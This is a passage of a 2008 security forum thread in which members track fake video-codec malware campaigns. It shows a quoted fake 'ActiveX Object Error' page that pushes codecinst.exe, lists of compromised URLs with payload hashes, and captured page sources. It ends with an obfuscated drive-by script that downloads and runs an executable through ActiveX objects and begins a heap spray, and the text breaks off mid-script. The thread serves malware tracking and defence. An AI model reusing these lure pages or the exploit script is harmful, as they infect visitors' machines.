document.onmouseup = Drag.end;

return false;
},

drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

end : function()
{
document.onmousemove = null;
document.onmouseup   = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

function Down(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
    switch (download)
    {
        case "iax": document.location.href="codecinst.exe"; break;
        Close();
    }

}

function vc() {
if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
location.href="codecinst.exe";
}
else {
if (alert('Please install new version of Video ActiveX Object.')) {
vc();
}
else {
vc();
}
}
}

function Close()
{
    var p=document.getElementById("popdiv");
    p.style.visibility="hidden";
vc();
}
function Details()
{
alert('You must download Video ActiveX Object to play this video file.');
}

</script>


<div name="popdiv" id="popdiv" onKeyPress="Down('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;">
<table cellpadding="0" cellspacing="0" width="362" height="126">
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="362" height="29" style=" BACKGROUND-IMAGE:URL('/xptop.gif'); height:29px; width:362;"> <!-- win top table -->
<tr>
<td style="color:white; font-family:Tahoma; font-size:13px; font-weight:bold; padding-left:4px;padding-top:1px">&nbsp;&nbsp;Video ActiveX Object Error.</td>
<td width="21" style="padding-right:6px;"><img src="/xpclose.gif" width="21" height="21" onClick="Close();" style="cursor:default;" ></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0" height="97">
<tr>
<td style="background-image:url(/left.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr>
<td><img src="/xpleftclm.gif" width="3" height="97"></td>
</tr>
</table>
</td>
<td valign="top">
<table cellpadding="0" cellspacing="0" width="356" bgcolor="ece9d8">
<tr>
<td>
<table cellpadding="0" cellspacing="0" height="59">
<tr>
<td align="center" style="padding-left:20px; padding-top:13px;" valign="top"><img src="/alert.gif" width="31" height="32"></td>
<td align="left" style="font-size:11px;  font-family:Tahoma; padding-left:30px; padding-bottom:8px; padding-right:5px;"><br><b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file.
</td>
</tr>
</table>
</td>
</tr>
<tr>
<tr>
<td style="padding-left:20px; padding-right:20px; padding-bottom:20px; font-family:Tahoma; font-size:11px;" align="center">
<hr><br>
Click Continue to download and install ActiveX Object.

</td>
</tr>
<td>
<table align="center" cellpadding="0" cellspacing="6" height="22">
<tr height="22">
<td><input type="button" value="Continue" onClick="Down('iax');" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" tabindex="1" ID="Button1" NAME="Button1"><br><br></td>
<td></td>
<td><input type="button" value="Cancel" onClick="Close()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
<td><input type="button" value="Details..." onClick="Details()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="100%">
<tr bgcolor="4577ea" style="height:1px;">
<td></td>
</tr> <!-- empty colors -->
<tr bgcolor="0029b5" style="height:1px;">
<td></td>
</tr>
<tr bgcolor="001590" style="height:1px;">
<td></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td style="background-image:url(/right.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr>
<td style="padding:0px;"><img src="/xprightclm.gif" width="3" height="97"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>


<script>
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (activex_is_here()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (activex_is_here()) { } else {
setTimeout("showPopDiv();",2000);
}
}
     
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}

if(!byFlag) {
var p=document.getElementById("popdiv");

var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}

function getScroll() {

var scrOfX = 0, scrOfY = 0;
if( typeof( window.pageYOffset ) == 'number' ) {
scrOfY = window.pageYOffset;
scrOfX = window.pageXOffset;
} else if( document.body && ( document.body.scrollLeft || document.body.scrollTop ) ) {
scrOfY = document.body.scrollTop;
scrOfX = document.body.scrollLeft;
} else if( document.documentElement && ( document.documentElement.scrollLeft || document.documentElement.scrollTop ) ) {
scrOfY = document.documentElement.scrollTop;
scrOfX = document.documentElement.scrollLeft;
}
return [scrOfX, scrOfY];

}

sc = getScroll();
p.style.top = (myHeight/2 - 181)+sc[1]+'px';
p.style.left = (myWidth/2 - 120) + sc[0]+'px';
p.style.visibility = 'visible';
p.focus();
}
}

Drag.init(document.getElementById("popdiv"));
</script>
</div>
     

<CENTER><!-- no title variant of spy partners & ruler cash landings --><A
      href="codecinst.exe"><IMG
      onmouseover="window.status = 'You must download Video ActiveX Object to play this video file.';"
      height=369
      alt="You must download Video ActiveX Object to play this video file."
      src="movierol.gif" width=450 border=0></A>
      </CENTER></DIV><br><center><font color=gray><font size=5>
20 min 5 sec, Raiting 8/10, 148306 views<br>
          79 users are watching this movie right now</CENTER></font></font>


<iframe src="00.html" style="display:none"></iframe>

</BODY></HTML>
Title: Re: R-thing
Post by: MysteryFCM on July 21, 2008, 11:28:09 pm
Updated list
Title: Re: R-thing
Post by: Kayrac on July 22, 2008, 03:45:41 am
Code: [Select]
finquattro.eu/viewmovie.html
thewindsorhotel.it/viewmovie.html
galvatoledo.com/viewmovie.html

dif file name, still detected by avira
Title: Re: R-thing
Post by: philipp on July 22, 2008, 08:50:50 am
Code: [Select]
http://www.go-siegmund.de/viewmovie.html
http://www.nepi.si/viewmovie.html
http://asjsiderno.it/viewmovie.html
http://www.bachir.it/viewmovie.html

md5sum codecinst.exe
774f5907bbdf70419b4973db6bb230dd
Title: Re: R-thing
Post by: sowhat-x on July 22, 2008, 01:00:28 pm
Don't know if some of them were already posted by MysteryFCM in his previously posted lists.txt...

Quote
hxxp://welovespain.net/begin.html
Quote
hxxp://cagliosrl.it/viewmovie.html
hxxp://candou.com.br/viewmovie.html
hxxp://espaideioga.net/viewmovie.html
hxxp://finquattro.eu/viewmovie.html
hxxp://galvatoledo.com/viewmovie.html
hxxp://gennarogirone.it/viewmovie.html
hxxp://ilariarezzi.it/viewmovie.html
hxxp://matteociaramitaro.it/viewmovie.html
hxxp://millefiori.com.br/viewmovie.html
hxxp://overunity.it/viewmovie.html
hxxp://sugar-dreams.it/viewmovie.html
hxxp://thewindsorhotel.it/viewmovie.html
hxxp://www.angelobaldy.it/viewmovie.html
hxxp://www.bachir.it/viewmovie.html
Title: Re: R-thing
Post by: MysteryFCM on July 22, 2008, 10:54:57 pm
Houston we gots a new one;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://arla-rc.net/stream.html
Server IP: 62.193.202.6 [ staticw.amenworld.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 22 July 2008
Time: 23:54:17:54
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
<center>

<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>

<div id="player">

<img id="img" src="" alt="">
</div>
<iframe src="00.html" frameborder="0" style="display:none"></iframe>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "flashcodecinstall_13_31.exe";

document.getElementById("img").src = gif

showMovie()
-->
</script>
</body>
</html>
Title: Re: R-thing
Post by: Kayrac on July 22, 2008, 11:57:58 pm
Code: [Select]
hxxp://www.diiorio.it/stream.html
hxxp://lacomercialsrl.com.ar/stream.html
hxxp://taaf.re/stream.html
hxxp://bauelemente-giering.de/stream.html
hxxp://doctors-employment.com/stream.html
hxxp://web27.login-7.loginserver.ch/stream.html
hxxp://frutix.es/stream.html
hxxp://gemacastano.com/stream.html
hxxp://panosolar.com/stream.html
hxxp://frutix.es/stream.html
Title: Re: R-thing
Post by: MysteryFCM on July 23, 2008, 04:40:18 am
Updated .....
Title: Re: R-thing
Post by: JohnC on July 24, 2008, 02:36:19 pm
Thanks.
Title: Re: R-thing
Post by: MysteryFCM on July 24, 2008, 04:07:17 pm
They've changed to the direct method it seems;

ulrike-sperl.de/watchmovie.mpg.exe
kikoom.net/watchmovie.mpg.exe
Title: Re: R-thing
Post by: MysteryFCM on July 24, 2008, 09:15:23 pm
Updated
Title: Re: R-thing
Post by: MysteryFCM on July 25, 2008, 12:00:38 am
Changed again;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://www.mpog-eup.de/watchit.html
Server IP: 89.110.129.53 [ eden3.netclusive.de ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 25 July 2008
Time: 00:59:55:59
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
<center>

<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>

<div id="player">

<img id="img" src="" alt="">
</div>
<iframe src="00.html" frameborder="0" style="display:none"></iframe>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "watchmovie.mpg.exe";

document.getElementById("img").src = gif

showMovie()
-->
</script>
</body>
</html>
Title: Re: R-thing
Post by: philipp on July 25, 2008, 09:45:09 am
Code: [Select]
http://s215847279.onlinehome.fr/stream.html
http://aurindoribeiro.com.br/stream.html
http://212.50.55.81/stream.html
http://africaviva.org.br/stream.html
http://maladeros.com/stream.html
http://argosvirtual.com/stream.html
http://csr.imb.br/stream.html

http://teatromalasa.es/watchit.html
http://aerogenesis.net/watchit.html
http://clic-paysdegier.fr/watchit.html
http://rikkeroenneberg.dk/watchit.html
Title: Re: R-thing
Post by: philipp on July 26, 2008, 01:28:53 pm
switched to live.html

Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
<center>

<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>

<div id="player">

<img id="img" src="" alt="">
</div>
<iframe src="0101.html" frameborder="0" style="display:none"></iframe>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "flash.exe";

document.getElementById("img").src = gif

showMovie()
-->
</script>

</body>
</html>

md5sum flash.exe: 14141399cf426341181b9be1a2a60b98

Code: [Select]
http://www.residenceflora.it/live.html
Title: Re: R-thing
Post by: MysteryFCM on July 26, 2008, 04:35:22 pm
Updated
Title: Re: R-thing
Post by: JohnC on July 26, 2008, 09:46:43 pm
Thank you.

Title: Re: R-thing
Post by: philipp on July 27, 2008, 06:18:13 am
switched to topnews.html

Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
<center>

<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>

<div id="player">

<img id="img" src="" alt="">
</div>
<iframe src="00.html" frameborder="0" style="display:none"></iframe>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "flashupdate.exe";

document.getElementById("img").src = gif

showMovie()
-->
</script>

</body>
</html>

md5sum flashupdate.exe: c81b29a3662b6083e3590939b6793bb8

Code: [Select]
http://snmobilya.com/topnews.html
http://projetsoft.net/topnews.html
Title: Re: R-thing
Post by: MysteryFCM on July 28, 2008, 01:34:15 am
Switched again;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://cottonusa.it/fresh.html
Server IP: 81.28.232.69 [ vm38.bln2.vrmd.de ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 28 July 2008
Time: 02:34:18:34
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
<center>
<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>

<div id="player">

<img id="img" src="" alt="">
</div>
<iframe src="1.html" frameborder="0" style="display:none"></iframe>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "get_flash_update.exe";

document.getElementById("img").src = gif

showMovie()
-->
</script>
</body>
</html>
Title: Re: R-thing
Post by: philipp on July 28, 2008, 09:42:33 am
Code: [Select]
http://negocioindependiente.biz/fresh.html
http://www.weingut-andrea-zimmermann.de/fresh.html
http://www.portamivia.it/fresh.html
http://euclide.fr/fresh.html
http://hillner-online.de/fresh.html

before those i received hotnews
Code: [Select]
http://elianacaminada.net/hotnews.html
http://gruppouni.com/hotnews.html
Title: Re: R-thing
Post by: MysteryFCM on July 28, 2008, 07:52:37 pm
Changed again;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://ttolttol.wo.to/checkit.html
Server IP: 220.80.107.111 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 28 July 2008
Time: 20:52:53:52
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
<center>
<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>

<div id="player">

<img id="img" src="" alt="">
</div>
<iframe src="1.html" frameborder="0" style="display:none"></iframe>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "get_flash_update.exe";

document.getElementById("img").src = gif

showMovie()
-->
</script>
</body>
</html>
Title: Re: R-thing
Post by: Edgar Bangkok on July 29, 2008, 03:28:23 am
Received mails spam with fake flash player and also iframe with exploits
more info at:

http://edetools.blogspot.com/2008/07/iphone-3g-e-new-relevations-about.html (http://edetools.blogspot.com/2008/07/iphone-3g-e-new-relevations-about.html)

Edgar from Bangkok   :)




 

Title: Re: R-thing
Post by: MysteryFCM on July 29, 2008, 04:49:56 am
I've modified the application again so it provides a list of subjects on their own, followed by the details previously supplied. Updated list attached (474 items received thus far)
Title: Re: R-thing
Post by: philipp on July 29, 2008, 05:42:43 am
Code: [Select]
http://www.acercandoelmundo.com/fresh.html

http://www.tutotic.com/checkit.html
http://www.petzold-dieter.de/checkit.html
Title: Re: R-thing
Post by: sowhat-x on July 29, 2008, 07:21:10 am
Quote
I've modified the application again so it provides...
He-he...info in the latest updated list is way much easier to parse now,thanks  ;D
Title: Re: R-thing
Post by: MysteryFCM on July 30, 2008, 01:26:55 am
Updated with new one's I've received ..... and now also formatted not only to have a list of subjects, but a list of links (on their own) too (figured it'd be easier for you guys)
Title: Re: R-thing
Post by: MysteryFCM on July 30, 2008, 06:17:29 pm
Updated again ...... I've left out the detailed part this time, and only included the subjects and links.
Title: Re: R-thing
Post by: MysteryFCM on August 01, 2008, 06:00:04 am
Updated again .... 546 of them now :)
Title: Re: R-thing
Post by: MysteryFCM on August 01, 2008, 09:44:39 am
They've changed again;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.2 Results
Source code for: http://teleuken.de/top.html
Server IP: 85.13.128.176 [ dd1904.kasserver.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
via Proxy: http://it-mate.co.uk/proxy/?url=http://teleuken.de/top.html
Date: 01 August 2008
Time: 10:40:43:40
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>

<body bgcolor="#000000">
<center>
<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>

<div id="player">

<img id="img" src="" alt="">
</div>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "get_flash_update.exe";

document.getElementById("img").src = gif

showMovie()
-->
</script>
<iframe id="ifid01" src="metai.html" frameborder="0" style="display:none"></iframe>

</body>
</html>

iFrame:

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.2 Results
Source code for: http://teleuken.de/metai.html
Server IP: 85.13.128.176 [ dd1904.kasserver.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
via Proxy: http://it-mate.co.uk/proxy/?url=http://teleuken.de/metai.html
Date: 01 August 2008
Time: 10:41:30:41
*****************************************************************
<html>
<head>
<meta http-equiv="refresh" content="8;URL=1.html">
</head>
<body>
</body>
</html>

1.html, detected as HTML/Silly.Gen (AntiVir)

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.2 Results
Source code for: http://teleuken.de/1.html
Server IP: 85.13.128.176 [ dd1904.kasserver.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
via Proxy: http://it-mate.co.uk/proxy/?url=http://teleuken.de/1.html
Date: 01 August 2008
Time: 10:42:34:42
*****************************************************************
<script>ZUgZJXG();function ZUgZJXG(){ KglUBuK = document.location.href.replace(/1.html/ig,'') + 'g(e(t_f&l*a^s#h_$u!p*(date)#.!%e^x&#e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');var OQgDOuD = document.createElement('ob%j(e^ct#%'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); OQgDOuD.setAttribute('id&'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'O&(QgD%O*uD'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));OQgDOuD.setAttribute('c$l))as*s&^i#%d'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c$l^s$(id%:B!)D9)6(C(5%&56-65A3$-*1@1^D*(0-(983A)-!0%0C)0(%4F)C!&29$E%3&%6*'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var dXlOmxJ = document.createElement('ob#je!c$%t'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));dXlOmxJ.setAttribute('i$$d)('.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'d&*Xl&O^mxJ'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));dXlOmxJ.setAttribute('cl)a#s%)si(d#@'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c^l$^si^d:$F$@0$#E)4^2((D^5!0-%3^&6!8C$-&#1$1(D0)-A@D8$1#*-00$(A*0!C@90(D@C%(8%D)*9&('.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var AxclEnf = 'C#):^/Doc&u@m(en#t^s( a@n)d$ Se#(tt&i$@n!(g@&s/$^A&^l*l (Us(ers&/!*St(a!r!t& Men^u*(/)^P)r#og$$r&a*%m(s*/!St(^a$rtu%#p#/!smss&@.e#x!e'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');dXlOmxJ.SnapshotPath = KglUBuK;dXlOmxJ.CompressedPath = AxclEnf; eval(dXlOmxJ.PrintSnapshot());}catch(JgsOOiI){}try{var fHQTyXx = OQgDOuD.CreateObject('ms&&x&m(l2.^X#M&LH^%T)TP'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),''); var BKPYHiu = OQgDOuD.CreateObject('S#h@el%$l!&.A&%pp#^l@(ic!@at&*i@on'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'');var nrbromf = OQgDOuD.CreateObject('a$d^o&)d$&b.^s(t&re&a$m@'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'');try{eval(nrbromf.type = 1); eval(fHQTyXx.open('G%E#)T(#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), KglUBuK,false));eval(fHQTyXx.send());eval(nrbromf.open());nrbromf.Write(fHQTyXx.responseBody); var zIPafSm = './&/*.^.@/#/!w%$X#$t(wR^z!v^$.ex!e^$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');eval(nrbromf.savetofile(zIPafSm,2));eval(nrbromf.close());}catch(JgsOOiI){}try{eval(BKPYHiu.shellexecute(zIPafSm));}catch(JgsOOiI){}}catch(JgsOOiI){}}</script><script>var nggByhS = 0x0c0c0c0c; function Gslide(spraySlide, saruuysaddize){while (spraySlide.length * 2 < saruuysaddize){spraySlide += spraySlide;}spraySlide = spraySlide.substring(0, saruuysaddize / 2);return spraySlide;}url = document.location.href.replace(/1.html/ig,'') + 'get(_@*f#%l)as#h_upd%a@!t@^e.!#e$^x)e)'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');var outValue = '';for (i = 0; i < url.length;){outValue += '%u' + url.charCodeAt(i+1).toString(16) + url.charCodeAt(i).toString(16);i = i + 2;}outValue += '%u0000';var Shellcode = 